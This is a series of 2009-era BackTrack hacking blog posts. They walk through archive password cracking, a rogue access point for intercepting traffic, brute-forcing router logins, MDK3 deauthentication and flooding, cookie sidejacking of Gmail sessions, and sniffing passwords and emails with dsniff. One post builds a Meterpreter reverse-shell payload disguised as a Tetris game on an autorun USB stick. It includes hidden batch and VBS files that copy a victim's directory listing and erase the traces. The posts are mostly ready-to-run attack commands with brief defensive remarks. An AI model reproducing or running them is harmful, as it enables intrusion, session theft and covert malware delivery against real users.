There are 3 test files included in the rarcrack directory, but lets try rarcrack on some of the files which I created which are on a USB drive; /media/4G/

Starting an attack ;

This below on a zip file created with WinRar;

./rarcrack --type zip --threads 8 /media/4G/TEST6-winrar.zip

This one below on a zip file created in 7-Zip with ZipCrypto encryption;
./rarcrack --type zip --threads 8 /media/4G/TEST-ZipCrypto.zip

This one below on a 7z archive with AES256 encryption;

./rarcrack --type 7z --threads 8 /media/4G/TEST1-AES256.7z

So Slow !

When a crack attempt is started, an xml status file is created in the directory where the archive file is located.
So we can stop the crack and edit the values of the xml file to help speed up the cracking process.

This xml file can be editted to change the character list being used for the crack, in this case as I know the
password is a numerical value, we can edit the xml file so that rarcrack only checks numbers;

nano /media/4G/TEST1-AES256.7z.xml

Changing the character set to numerical only;

Now we restart the attack on the 7z file and the attack will resume but now only check numerical values;

./rarcrack --type 7z --threads 8 /media/4G/TEST1-AES256.7z

Video on the above using rarcrack can be found here ;

http://blip.tv/file/2816224
or
http://www.youtube.com/watch?v=BMFn-jps3iY

Although I am trying to stick to the back|track tools in my posts, I have to divert somewhat here and mention a Windows tool by Elcomsoft; "Advanced Archive Password Recovery" (ARCHPR).
It is a great tool and Elcomsoft have password recovery tools for a fantastic number of filetypes.

It has an easy interface with various cracking options such as Bruteforce and Dictionary attacks, and is also able to include characters which you think may be correct and mask those you want testing, as in; pass????.

The speed reached is much better in most cases than what rarcrack achieves and also is more flexible on which files can be chosen, although it does not support 7zip created archives.

With rarcrack I was having trouble with it catching the passwords on zip files with AES encryption, ARCHPR has no trouble with these.

ARCHPR in action with bruteforce options ;

Dictionary attack ;

Fake AP using airbase-ng

2009-10-30T14:59:00.005+01:00

Here we will have a look at creating a fake AP and passing internet traffic through our fake ap.

I had a lot of trouble with this and only really was able to complete it with the help of Gitsnik & Nick The Greek on the Remote Exploit forums.. awesome help there guys ;)

The steps involved are basically ;

Configure dhcpd.conf
Start the fake ap with airbase-ng
Configure IP tables to pass through to host internet
Capture / Monitor network traffic with tool of choice

In this case my test setup is as follows ;

> Using back|track4 pre final
> Using WiFi dongle to create a connection to internet on wlan1 (through gateway 192.168.1.1)
> Using my netbook wireless card (Atheros) to create the fake ap

First to create/configure the dhcpd.conf file for later use ;

nano /etc/dhcp3/dhcpd.conf

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 4.2.2.2;
range 192.168.2.130 192.168.2.140;
}

Ctrl X --> y --> Enter to save the file.

Then to start the fake ap with airbase, the interface needs to be in monitor mode ;

airmon-ng

airmon-ng start wlan0

airbase-ng -e "TEST_AP" -c 9 mon0
This will create a simple tap interface, on at0, with no encryption, on channel 9 and with the essid TEST_AP.

In this case I already had an internet connection up and running on wlan1, hence the warning messages, however this was of no further consequence.

Then bring the interface up and assign subnet and gateway;

ifconfig at0 up

ifconfig at0 192.168.2.129 netmask 255.255.255.128

route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

Then start DHCP, I was getting errors on the dhcpd settings, this is where the help came in :)

Needed to give further privilages to the dhcpd.

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd

Then to point the command to the alternative dhcpd.conf file and the alternative .pid file

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

Then to setup the iptables to route the traffic through the tap interface to the internet connection (internet connection being the one wlan1 is connected to over my 192.168.1.1 gateway).

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1

Now basically you have a fake ap which people can connect to and browse the internet.. all through your connection.

Obviously this can be abused in any number of ways, all traffic can be captured and analyzed;
dsniff could be run on it together with urlsnarf, driftnet etc., sessions could be hijacked in real time..

So goes to show that you should be wary of free access points..

Using Hydra or Medusa to gain access to network router

2009-10-14T10:42:00.004+02:00

After obtaining a connection to the network and having an IP address, besides trying to acccess the hosts on the network, the actual router can also be targetted.

This could be done by would be attackers to for instance attempt to delete any logs on the router which may have logged their intrusion to the network.
Or to simply reboot the router which mostly has the same effect.

On Windows based systems, this could be done using either Bruter or Brutus.

Using trusty ol' back|track, the preference goes to either medusa or hydra.

For the sake of this test, a simple test setup as follows ;
> Open network
> DHCP enabled

Basically the steps involved are as follows ;

Identify network
Gain access to network
Obtain IP address
Check gateway IP
Check path the router setup page is using
Start Hydra / Medusa using wordlists for both login and password if login is not known.

airmon-ng

airmon-ng start wlan0

airodump-ng mon0 -t opn

ifconfig wlan0 down

iwconfig wlan0 essid default channel 1

iwconfig ap 00:13:D4:09:32:60

ifconfig wlan0 up

Check connection

iwconfig wlan0

Obtain IP address and check gateway

dhclient wlan0

Open upthe default gateway in your browser

Of course, before starting cracking away, it is always worth while to check the standard login / passwords first !
http://www.phenoelit-us.org/dpl/dpl.html

If no luck, then you have to revert to using wordlists, I have made a couple of small ones to try this out.

Starting Hydra to crack the router login / password.
-L          specifiying the path to login list
-P        specifying the path to password list
-t           limiting the number of connections
-e ns      to check for no password and to check login as password
-f           to stop when first login/password is found
-V          to show each login/password attempt
http-get to specify the protocol to use
/index.asp to point to the webpage it is heading to

hydra 192.168.1.1 -L /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -V http-get /index.asp

For Medusa, the syntax is slightly different and took me a while to figure out what was necessary to avoid getting false positives, however the below worked for me ;

-h     to specify the host
-U     to specify path to the login wordlist
-P     to specify path to password wordlist
-t      to limit the number of connections
-f      to stop the test on finding a valid login/password
-v for a more verbose output
-M    to specify the module to use
-m    to specify the options for the module in use

medusa -h 192.168.1.1 -U /wordlists/login.txt -P /wordlists/ap_password.txt -t 1 -e ns -f -v 5 -M http -m DIR:GET/index.asp

Now when trying the found login / password, success !

Hydra homepage - http://www.thc.org

Medusa homepage - http://www.foofus.net

Video covering the above ;

http://blip.tv/file/2718495
or
http://www.youtube.com/watch?v=WTpjaYxbITw

MDK3 - network traffic disruption

2009-10-07T13:29:00.006+02:00

Following up on the previous post with mdk3, there are a few other options with mdk3, however it has to be said that the use of these options can wreak havoc on wireless networks and should be used with caution !
And of course as with all the tools in the posts, only on the networks you are authorized to run the tools on.

I am still unsure as to what MDK3 stands for, however I remember playing a game ages ago called MDK and the abbreviation, although never confirmed, was taken to mean Murder Death Kill..
In that case it is fair to say that it sums up what mdk3 can do to wireless networks quite well..

My test network;
AP with bssid 00:13:D4:09:32:60 on Channel 1 with essid default
Wep Shared Key encryption
1 client 00:24:D2:A1:40:8E connected

The below based on having installed mdk3 as per previous post.

For a full list of mdk3 options;
mdk3 --fullhelp

Beacon Flood mode

This mode sends out beacons showing fake APs and reportedly can cause network scanners and drivers to crash.

I did a quick test with this, scanning with inSSIDer, and it certainly does flood the environment with fake APs.
It didn't crash the programme, however I only let it run for a short period of time to get an idea of what happens, what prolonged usage would cause not confirmed.

The below sets the SSID to be transmitted as DEFAULT with WEP encryption as 54Mbit using valid accesspoint MACs from OUI database, speed set at 50 pps (default speed)

mdk3 mon0 b -n DEFAULT -w -g -m -s 50

The scan with inSSIDer looked as follows ;

Not sure why the majority seemed to be on lower channels, however as mentioned, I did not want to run it for too long and possibly a longer run would see more networks showing up in the higher channel region.

Authentication DOS mode

The idea is that too many clients authenticating to the AP will freeze up or reset the AP.

Surprisingly, my crappy little 'ol Asus router seemed to be handling this rather well !
I tested it several times, it froze a couple of times for a few seconds, however then seemed to fight back and work even though the speed was severely affected..
What a trooper !

mdk3 mon0 a -a 00:13:D4:09:32:60 -m

Deathentication / Disassociation Amok Mode

This is used to kick clients from an AP.

In this case I created a txt file with the AP MAC and used this as the blacklist.

echo 00:13:D4:09:32:60 > mdk3test.txt

mdk3 mon0 d -b mdk3test.txt -c 1 -s 250

This didn't actually kick my client off as an aireplay attack with sufficient packets would have done, but it effectively stopped all communication between the AP and the client.

There are a few other tools as well, including MAC address bruteforcing, and various other wireless disruption tools.

All in all a very interesting tool to check out, but obviously meant to be very unfriendly towards wireless networks..

Test with care..

Using MDK3 in back|track 4 to crack hidden SSIDs

2009-10-04T21:36:00.017+02:00

Although mdk3 is not (yet) included in BT4, it is a great tool to have.
(! with the release of Backtrack 4 Final, mdk3 is back with mdk3v6! Found in /pentest/wireless/mdk3/)
The below installation guide only applicable to Backtrack 4 Pre Final.
To get it installed, Virchanza wrote up a means to do so here;
http://forums.remote-exploit.org/backtrack-4-package-feature-requests/23803-mdk3.html
The contents of interest being ;

wget http://virjacode.com/projects/beefup/dloads/mdk3.tar.bz2
tar xjf mdk3.tar.bz2
cd mdk3-v5
sed -i 's|-Wall|-w|g' ./Makefile
sed -i 's|-Wextra||g' ./Makefile
sed -i 's|-Wall||g' ./osdep/common.mak
sed -i 's|-Wextra||g' ./osdep/common.mak
sed -i 's|-Werror|-w|g' ./osdep/common.mak
sed -i 's|-W||g' ./osdep/common.mak
make
make install
cd ..
rm mdk3.tar.bz2
rm -r mdk3-v5

The reason I used it was to decloak hidden SSIDs by means of either a brute force or a dictionary attack, but there are many other interesting options with mdk3 !

In this test setup, I have an AP setup as follows ;

BSSID 00:13:D4:09:32:60 on Channel 3 Hidden SSID of 3 characters only.

So checking the test setup in airodump shows ;

In order to try to crack the hidden SSID, we can try a bruteforce attack, however it is always best to first try a dictionary to see if it isnt a standard essid name.

To get a decent dictionary list, you can get the one which the Church of WiFi used for their tables.
http://www.renderlab.net/projects/WPA-tables/
And of course you can drive around a bit and collect a few more to add.

The general usage in this case for using mdk3 with wordlist is ;

mdk3 [iface] p -c [channel] -t [bssid] -f [path to wordlist] -s [packets/sec]

So in my case;

mdk3 mon0 p -c 3 -t 00:13:D4:09:32:60 -f /wordlists/ssid.txt -s 50

(can do more packets per sec. but just for example's sake)

So when successful in finding the SSID and airodump is left running, the found SSID will pop up in airodump;

If the SSID cannot be found in the wordlist, then bruteforce approach can be tried, but only for short SSIDs.
It took my setup around 30min to crunch through all printable characters for the 3 character SSID..

The general usage of the bruteforce attack is as follows ;

mdk3 [iface] p -c [channel] -t [bssid] -b [character set] -s [packets/sec]

The brute force character set is as follows;

a all printable
l lower case
u upper case
n numbers
c lower and upper case
m lower and upper case plus numbers

It is worth mentioning that the number of packets per second did make a difference for me when using the bruteforce option.
It failed to correctly identify the essid on my test network when no limit was set (then it does max 300pps), however it did work succesfully when limiting to 150 pps.

Mind you it is being tested on a pretty old ASUS WL-530g router.. so not surprising really..
What works for other routers is probably simply a matter of trial and error.

Also, airodump seemed to conk out after about a minute of running possible ssids to the router with the message;
"Caught signal 14 (SIGALRM). Please contact the author!"

Anyway..

Starting up the attack using brute force;

mdk3 mon0 p -c 3 -t 00:13:D4:09:32:60 -b a -s 150

Again the results may vary using different packets/sec.

The screen will also show SSIDs of other networks which are picked up during the attack, but will then happily continue until either the full scope of the attack is finished, or the SSID is found.

MDK3 also has, among others, the interesting capability to effectively render communicating with a wireless network impossible, however to keep the posts semi short and sweet will come back to that another day..

MDK3 homepage - http://homepages.tu-darmstadt.de

A video showing the above ;
http://blip.tv/file/2681248
or
http://www.youtube.com/watch?v=52d1FsfJ2Ek

Sidejacking using Ferret & Hamster

2009-10-02T12:21:00.007+02:00

Sidejacking is a form of HTTP session hijacking, basically stealing cookies from sessions of users on a network, then using these cookies to re-enable the sessions.

Think for instance of online email accounts, social networking sites and the like.

In this case the sidejacking test is done as follows ;

wpa protected network on channel 4
monitor with airodump --> deauth client --> capture handshake --> continue collecting info
airdecap the cap file
run cap file through ferret and then check with hamster

First stop is to indentify the target network, note associated clients, start capturing and ensuring that the 4-way handshake is included in the capture by using a deauth attack so as being able to later correctly decrypt the packages.

airmon-ng

airmon-ng start wlan0

airodump-ng mon0 -c 4 --bssid 00:11:22:33:44:55 -a -w test

aireplay-ng mon0 -0 5 -a 00:11:22:33:44:55 -c 00:11:22:33:44:55

Now we have the handshake and we let the session capture packets.

On the target network, we browse around and visit various test accounts on popular sites, in this case I have checked out Gmail & Hyves.

We then stop the capture and decrypt the captured packets with airdecap.
(For this to work there must be a 4-way handshake in the capture file, the decryption will only start from the moment the handshake is captured)

airdecap-ng test-01.cap -e ESSID -p 'WPA_PASSWORD'

The packets will be decrypted and a file test-01-dec.cap will be created.

Now to pass the decrypted capture file through ferret.

cd /pentest/sniffers/hamster/

./ferret -r ~/test-01-dec.cap

When succesfully done running through ferret, hamster.txt will be created and hamster can be started to start the proxy. (best to be online at this stage)

./hamster

We then open up the browser and set the proxy configuration to be able to use Hamster.

Edit --> Preferences --> Advanced --> Network --> Settings

Configure the Manual proxy settings as follows;
HTTP Proxy: 127.0.0.1 Port: 1234

Then we open up Hamster in the browser.

http://hamster

On opening Hamster, you will see a list of IP addresses from which Hamster has been able to find cookies.
In this case just the one; 192.168.1.100

Click on the IP address of interest to clone the the target.

In the left pane you will then see the IP address being cloned and urls of interest.
The top urls are the ones deemed of most interest, the lower urls are are the urls seen from the targetted IP address.

You can then click on the urls of interest and you will be taken to the session in question (if still valid)

In the above you can see that you are logged in to google and also have full access to the gmail account and
also have full access to the Hyves account.

If the google account has the option "always use https" checked, then the above will not work with gmail/google.

But still goes to show you should never access your online email accounts etc over an insecure network.. !

Information on Hamster by the author;
http://hamster.erratasec.com/help/index.html

A video showing the above, slightly different as cracking WPA with cowpatty is included in video.

http://blip.tv/file/2676326
or
http://vimeo.com/7245265

Connecting to a network without DHCP

2009-09-28T09:25:00.005+02:00

Connecting to a DHCP enabled network will automacially get you an IP address, but how to go around getting a valid IP address on a network that does not automatically give an IP ?

When DHCP is not enabled, you are not automatically given an IP address and the router is only allowing access via set IP addresses.
Basically this means that the router only works with static IP addresses which have been pre-assigned to the computers.
The range of the set IP addresses is variable, so we need to figure out how to find that out.

I am doing this on my test network which is an open network without mac filtering with DHCP disabled.

My test network is on channel 1, essid "default", bssid 00:13:D4:09:32:60
no encryption set and DHCP disabled

So if trying to connect with the connection manager WICD for instance, it will fail when trying to obtain the IP address.

This however does not mean we can't associate to the network, it just means we cant (yet) get an IP.

So to get a connection to the router we need the following information;

The channel the network is on
The ESSID
Access Point MAC address

An easy way to get that info for the test network is to do an iwlist scan and grep out the relevant information ;

iwlist wlan0 scanning | egrep 'Channel|Address|ESSID'

Or of course can quickly run airodump-ng.

Now we re-configure our interface and enter the above information.
I first put the card down, as I like to control when it starts trying to access any network .

ifconfig wlan0 down

iwconfig wlan0 channel 1 essid default ap 00:13:D4:09:32:60

Check the input to be correct.

iwconfig wlan0

Note the link quality, no connection.
All is good to go, time to put the card up;

ifconfig wlan0 up

Now when checking we see that we have a connection with the access point !

iwconfig wlan0

So to check the IP address range in use there are a couple of options ;

Using tcpdump;

tcpdump -i wlan0

This tool will simply show a running list of all packets sent, in the output there will be some IP addresses in plain text which of course can also help you on your way.

netdiscover -i wlan0

This scans possible IP ranges and will list the IP addresses found and the MAC addresses of the access point and any connected clients.

Monitoring with KISMET

Kismet will show IP ranges it has been able to discover as long as there is some activity from the client side.

The above examples have been made with a client connected to the router and for the kismet & tcpdump examples also some activity from the client side.

I was preparing this post playing around with 2 different clients, hence sometimes IP 192.168.1.4 and sometimes 192.168.1.5

When we have either an IP address from a connected client, or an IP address from the router so that we can make an educate guess as to a correct IP range we re-configure the interface again;

Setting the IP address and netmask;

ifconfig wlan0 192.168.1.4 netmask 255.255.255.0

Adding the gateway;

route add default gateway 192.168.1.1

Adding the DNS server;

sh -c "echo nameserver 208.67.222.222 > /etc/resolve.conf"

Of course if a user is already using the IP address, you cannot use the same one as it will cause conflicts.
You can however use the same IP address by kicking the associated client off the network with a deauth attack, possibly spoofing the mac address as well in case the IP is linked to a certain mac address.

My test network is not connected to the internet, however the above should help you on your way in understanding what can be done if having difficulty getting an IP.

You will not always need to enter the DNS server depending on what you are trying to accomplish on the network.

But in the above case the connection should be done and you are able to browse away to your heart's content !

A great reference to connecting to networks in Linux has been made by Virchanza;
http://virjacode.com/tutorials/linux_inet_connect.html

Vulnerability assessments using openVAS - Starting a scan

2009-09-25T12:59:00.003+02:00

So now the OpenVAS is started up with the Global Settings and connected to the Open VAS server as per the last post, time to continue.

The below is based on being on the network to assess and to have an IP address assigned (DHCP).

First of all of course, we need to identify the IP address of a target to scan.
This can be done is several ways, either using Netdiscover or Nmap.
With wlan0 being our interface best to check the ip your on with;

ifconfig wlan0

That should give you an idea on the IP range in use.

To find other IPs on the network you can then do ;

nmap -sP 192.168.1.0/24

Now in the OpenVAS Client window, start a new Task.
Go to Task --> New and rename if desired, here I renamed to test.

With the task selected, start a new scope.
Go to Scope --> New and rename if desired, here I renamed to testvictim.
You will need to connect to the server again, by clicking on the connect icon, same as done in previous post.

After connecting to the server (see again bottom right is mentioned; Connection: root@localhost) go to the General tab, here the only change I made was selecting "Safe checks".

Then head to the Plugins tab, you can select the plugins to be used, in this case I used Enable all to use all plugins available.

Now time to select your target IP. I have chosen to pick 192.168.1.102.

Now to finally start the scan !

Go to Scope --> Execute and the scan will commence, first scanning the ports, then checking them.

After a while with the scan complete, you will see a report appear under the testvictim scope.
Double clicking it will open it up on the right and you can go through the various warnings / messages noted.

Not much of interest noted from this scan, but the above is the basics of how to get started with vulnerability scanning of hosts on a network !

A lot of the info on the OpenVAS setup was seen on dookie2000ca YouTube video in which he shows the process from vulnerability assessment to auto_pwn-ing a box;
http://www.youtube.com/watch?v=BY2LCGUjm7k&feature=channel

Also excellent references of course found on OpenVAS' site;
www.OpenVAS.org

A great 101 guide ;
http://wald.intevation.org/frs/download.php/558/openvas-compendium-1.0.1.pdf

Vulnerability assessments using OpenVAS - Setting up

2009-09-25T00:09:00.006+02:00

OpenVAS is an open source fork of Nessus, which is a well established tool for vulnerability assessment.

Why OpenVAS instead of Nessus ? Well OpenVAS is on the standard back|track 4 pre final installation..

Briefly laid out, what is being done to get OpenVAS working is as follows;

An SSL certificate is created to allow communication between the OpenVAS Server and the OpenVAS Client.
A user account is made, so that the client is able to use the OpenVAS server.
A syncronisation process with an OpenVAS NVT Feed is performed to update plugins.
A local OpenVAS Server is started to load all plugins.
OpenVAS Client is started to get down to business !

Setting up the tool (need to be online to synchronize in step 3)

Step 1) Make a certificate.

You can simply press enter down the whole route, adding in information on your Country and City if you so choose.
At the end you will be presented with the screen that your server certificate was properly created.

Press Enter to exit and close the console.

Step 2) Add a User

Login : root
Authentication (pass/cert) [pass] : just hit enter
Login password : toor (just to be original with the BT theme.. ;)
Login password again : toor

Hit Ctrl + D when asked to enter rules for this user. You dont need to.

When asked if all OK, hit y, user is added and you can exit the console.

Step 3) Synchronize with OpenVAS to update all plugins

The synchronization process will start straight away.
When it is completed you can exit the console.

Step 4) Starting the OpenVAS Server

The server will start to load the plugins straight away, this can take a wee while.

When all plugins have completed loading, minimize that console window (dont close it !).

Step 5) Start the OpenVAS Client

This will start a GUI in a seperate window

First click on the connect icon at the top left to establish a connection with the local server.

You will be prompted for your password that was entered when adding the user (in this case toor).
Upon clicking OK you will be prompted to choose the level of SSL paranoia (choose top one).
Then finally you will be prompted to accept the certificate.

The Client will load the plugins and dependancies from the server and upon completion, you will see "Connection: root@localhost" in the bottom right.

At this stage the client is prepped, loaded and ready to get going, just a few quick steps away from getting a scan going !

Part 2 will show setting up for a simple Vulnerability check.

Analyzing / Monitoring network captures with dsniff

2009-09-21T17:38:00.018+02:00

If you readily have access to the network, be it open or encrypted with WEP or WPA, the capture files can show a lot of information on what the target network was up to.
The toolsuite dsniff, consists of dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf and webspy.

I'll be looking at ;
urlsnarf shows the websites (urls) which were visited
driftnet can show pics of websites visited... (ooffff...)
dsniff can show passwords used in webforms
mailsnarf shows downloaded emails

Basically what we are doing is;
> capturing network traffic using airodump
> decrypting the network traffic using airdecap
> replaying the network traffic using tcpreplay
and using the above tools to check out the network session.

First stop is to identify our network that we want to monitor.

airmon-ng

airmon-ng start wlan0

airodump-ng mon0

Locate the network, specify channel, bssid and output file.

airodump-ng mon0 -c 4 --bssid 00:11:22:33:44:55 -w wpa

As we are capturing from a WPA network, and want to decrypt lateron, a handshake needs to be in the capture file.
(The packets will only be decrypted as from the moment the handshake is obtained)
So after starting the airodump capture, start a new console and deauth a user forcing that user to reconnect ensuring the handshake will be in the capture file ;
(Here i did the deauth attack twice just to be sure the capture would be included)

aireplay-ng mon0 -0 -5 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00

In airodump we will see the handshake captured in the top right of the screen.

Now we (the target PC) happily browse away and after a while stop the airodump capture.

To decrypt the WPA capture file, we will use airdecap-ng.
Tto correctly decrypt we need the network ESSID, the capture file with handshake and the WPA passphrase.

airdecap-ng -e ESSID -p 'wpa_password' wpa-01.cap

If successfull, you will see x amount of packages decrypted and there will be a new file; wpa-01-dec.cap
This is the decrypted cap file.

Now to see what results we were able to obtain !

Open a new console and startup urlsnarf, specifying the local interface;

urlsnarf -i lo

To replay the network session, we use tcpreplay on the local interface using the decrypted file ;

tcpreplay -i lo wpa-01-dec.cap

In the console running urlsnarf you will see details coming by of the websites visited.

To speed up the replay, you can use the -t option to go as fast as is possible.

tcpreplay -i lo -t wpa-01-dec.cap

When the replay is completed it simply stops and you can close the close the other consoles after checking what you wanted to check.

You can run the tools together ;
Open up seperate consoles for each tool, again specifying the local interface.

dsniff -i lo

mailsnarf -i lo

driftnet -i lo

(driftnet opens up a seperate driftnet window showing the pictures)

Then when those are up, open a console and run tcpreplay -i lo wpa-01-dec.cap.

After visiting several sites, entering passwords to sites, checking my email on Outlook Express, checking several semi-decent sites ... *cough* ... my results were ;

urlsnarf
works well in showing the urls visited, nothing to remark on there.
Below the results of checking out one of UK's "finest" newspapers...

driftnet
Did not show the amount of pics I was expecting to see.. but does show quite a few, it depends on the sort of sites visited, will need to do some more checking on this one.
Below he result of browsing through said newspaper in the driftnet window.. What class.. !
If NSFW.. emigrate.. ;)

dsniff
Only worked on 1 out 5 passworded sites I tried, not too impressed, but quite relieved to be honest !
The results from a browser game I am into;

mailsnarf
sometimes showed emails I downloaded from Outlook Express, sometimes didn't.
When I had several mails it showed them, when I only 1 to download, it didnt, part of a result of the time it did work ;

All in all not a flawless result, but definately interesting and entertaining !.

As yet I have been unable to get webspy working using tcpreplay, a shame as webspy is reportedly able to
show realtime internet use in a browser window, which I had hoped would be able to be done using tcpreplay as well.
Have to look deeper into this later on.

I will be looking further into how to get maximum results from these tools and updating this post accordingly.

Access to network --> Some SE --> Access to PC

2009-09-14T11:59:00.027+02:00

So after gaining access to the network, the goal is to gain access to another PC on my network.

In this case I will be creating a payload to be run on the computer I want to access.

Gratz to Gitsnik for the assistance in getting through the parts where I got stuck :D

Using back|track 4 Pre Final

Open up a shell

cd /pentest/exploits/framework3/

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 X > payload.exe

192.168.1.101 being the IP address of the machine I am running back|track from.
(the "attacker")

This payload.exe is the file we need to be executed on the PC on our network we would like to access.

To re-enact a more real-world situation, I have done the following;

> Got a small USB drive and renamed it to "TETRIS"

> Renamed the payload.exe to tetris.exe and copied to the root of a USB drive.
Changed the attributes of tetris.exe to 'hidden'.

> Copied a real tetris executable to the root of the USB drive and re-named to -TETRIS-.exe.

> Created a batch file "start.bat" to run both tetris.exe & -TETRIS-.exe
start -TETRIS-.exe
start tetris.exe

Changed attributes of start.bat to 'hidden'.

Created an autorun file to run the batch file, copying the icon from the real tetris executable
and including an action to the start-up menu ; "PLAY TETRIS".
[autorun]
icon=-TETRIS-.exe
label=TETRIS
action=PLAY TETRIS!
ShellExecute=start.bat

Changed attributes of autorun.inf to 'hidden'.

On my main PC the settings are such that autorun is disabled, and to show all hidden and system files.
So when opening the drive it looks like this ;

On most stock installs of windows autorun is on and the settings are to hide hidden files from view, so when inserting the USB you would see this ;

To start up the session, we first need to create a session the attacking PC, with which to communicate with the payload.

In a shell;
cd /pentest/exploits/framework3/

./msfconsole

Then in msfconsole;

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.1.101

exploit

Now we insert the USB into a stock windows machine (target), consider ourselves witless and click on OK..
wait for the connection on our attacking machine.

Following clicking OK the target pc is presented with a brief glimpse of a command-prompt window advising starting tetris.exe and -TETRIS-.exe, followed by a (working) Tetris game opening;

Seeing a command prompt opening and running a couple of exe files would wake most people up,
but most people dont seem to worry about what is happening on the pc as long as it 'does what they want it to do'.

You can also edit the start.bat file to ;
@ echo off
start -TETRIS-.exe
start tetris.exe
This will still briefly open up a command prompt, but no information will be shown on what it is doing.

After the tetris.exe is executed on the target's machine, the msfconsole should start a session and the screen should change to;

meterpreter >

You can then type ;

execute -f cmd.exe -c -H -i

This should get you a command prompt, hidden from sight by the actual user of the target's machine (-H), but under your control and you are able to browse through the targets pc etc.

NOTE!
If there is any type of firewall installed, it will ask for permission to allow 'tetris.exe' to access the internet.
As the user is running a tetris program, this could fool the user into accepting this.

So goes to show..
> TURN AUTORUN OFF
> be very careful about what you plug into your system
> Make sure you know precisely what you are allowing to access the internet..

edit

===

I fine tuned the files on the USB to be a little less obvious when starting up and for fun added a line to get a list of all files and directories from the c-drive.
Not that this has anything to do with the exploit, but it was fun to play around with ;)

So I created a vbs file with the following code;
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "-TETRIS-.bat" & Chr(34), 0
Set WshShell = Nothing
and named it -TETRIS-.vbs

Altered the autorun.in to start the vbs file;

[autorun]

icon=-TETRIS-.exe
label=TETRIS
action=Play Tetris
ShellExecute=-TETRIS-.vbs

Created a new autorun pointing to the -TETRIS-.exe to later replace the original one pointing to -TETRIS-.vbs and named this tetris.inf
[autorun]
icon=-TETRIS-.exe
label=TETRIS
action=Play Tetris
ShellExecute=-TETRIS-.exe

Altered the -TETRIS-.bat file to
- list the folders and files of c-drive, copy this information to USB and give it hidden attributes and delete the file from the host c-drive.
- delete the original autorun file and replace it with one which only points to -TETRIS-.exe
- delete the -TETRIS-.vbs file
@ echo off
start -TETRIS-.exe && start Tetris.exe
tree /f /a C:\ > c:\tree_c.lst && copy c:\tree_c.lst -TETRIS-.ini && attrib +h "-TETRIS-.ini" && del c:\tree_c.lst
attrib -h autorun.inf && attrib -h tetris.inf && del autorun.inf && ren tetris.inf autorun.inf
attrib -h "-TETRIS-.vbs" && del -TETRIS-.vbs
exit

So basically when OK is clicked after inserting the USB drive on a PC with autorun enabled, exploit is started, the tetris game opens without command prompts, a list of all folders and files of the c-drive is made, copied to the USB drive as a hidden file named -TETRIS-.ini.
The new autorun is not hidden and only points to the game, the vbs file is deleted.
Basically I did this so that even if the unsuspecting user sees the hidden files, the names and types of files look as if they are something to do with the tetris game.
Anyone with any idea of how things work will of course see something is up ;)

Completely useless but fun to make :) even though the ugliness of it all will probably make Gitsnik cry..

Network mapping with Kismet-newcore + giskismet

2009-09-07T10:24:00.040+02:00

I finally decided to make a persistent install of BT4 Pre Final on a USB stick to be able to get Kismet running as it should without having to upgrade each time..
With persistent install on usb, update (when online of course ;) )

apt-get update
apt-get upgrade

My USB GPS device is a simple generic one, nothing special and although I cant remember the cost,
it was not more than around $50,-/$60,-

Then a quick edit to the kismet.conf file, we can do this with nano;

nano /pentest/wireless/kismet-newcore/conf/kismet.conf

Just edit to make sure the gps device is pointing correctly to ttyUSB0.

Ctrl + X (to close after amending)
Y (Yes to save)
Enter (to save as same file name)

Then start up gpsd and we're good to go.

gpsd /dev/ttyUSB0

So with the Kismet-Newcore and GPS set to work, it was war-driving time !

So starting up kismet with the GPS;

In kismet going to Windows --> GPS Info

All is well, now just time to hop in the car and drive around a little !

When done, just exit kismet.

Now we can use giskismet, first inserting all information into a GISKismet database file from which we can create .kml files to put in either google maps or google earth.

So in the directory where the kismet files are;

giskismet -x kismet_netxml_file.netxml

wireless.dbl will be created, then we can make some .kml files depending on what we want to see.

giskismet -q "select * from wireless" -o output_all.kml

The .kml file will be created in that same directory with all information on all access points seen and can then be opened with google earth.

If for instance only want to show AP's with an ESSID "linksys";
giskismet -q "select * from wireless where ESSID='linksys'" -o linksys.kml

Resulting .kml in Google Earth;

Showing only AP's without any encryption;
giskismet -q "select * from wireless where Encryption='None'" -o None.kml

Showing only AP's with WEP encryption;
giskismet -q "select * from wireless where Encryption='WEP'" -o WEP.kml

You can actually filter the input to this database on channel / essid / bssid or encryption.

For instance;
giskismet -x kismet_netxml_file.netxml --channel 1 --encryption None

then
giskismet -q "select * from wireless" -o output.kml

This will give you a .kml file directly with only networks shown which are on channel 1 without encryption.

Resulting .kml in Google Earth;

The amount of networks you see with either no encryption or WEP is really staggering..

Still trying to figure out how best to grep out the SSIDs for entering in my essid list for cracking hidden essids.
Wrote a bit of code that the blog wouldnt even let me post, so must be rough ! Will be reverting on that..

So got some help.. thanks Gitsnik !

Still quite a mouthful, but gets the job done, am pleased to say that what I had, although ugly, actually worked as well ;)

grep SSID kismet-nettxt-file.nettxt | egrep -v 'BSSID|SSID [0-9]' | sed 's/.*://' | sed 's/"//' | sed 's/"//' | sort -f | uniq > ssid.txt

Still not 100% perfect, but I'm sure I will be able to 'prettify' (omg) it after some further resting, testing and trials.

So after some trial and error, and not a little help from Gitsnik;

grep SSID test.nettxt | egrep -v 'BSSID|SSID [0-9]' | cut -c 18- | sed 's/"//g' | sed 's/ *$//g' | sort -fu > ssid.txt

Seems to be pretty clean so far !

To make things a little easier on stripping out the SSIDs, made a couple of scripts which I thought

I would share for the hell of it ;

SSIDstrip_v0.1

ssidstrip_v0.1 can be downloaded here;
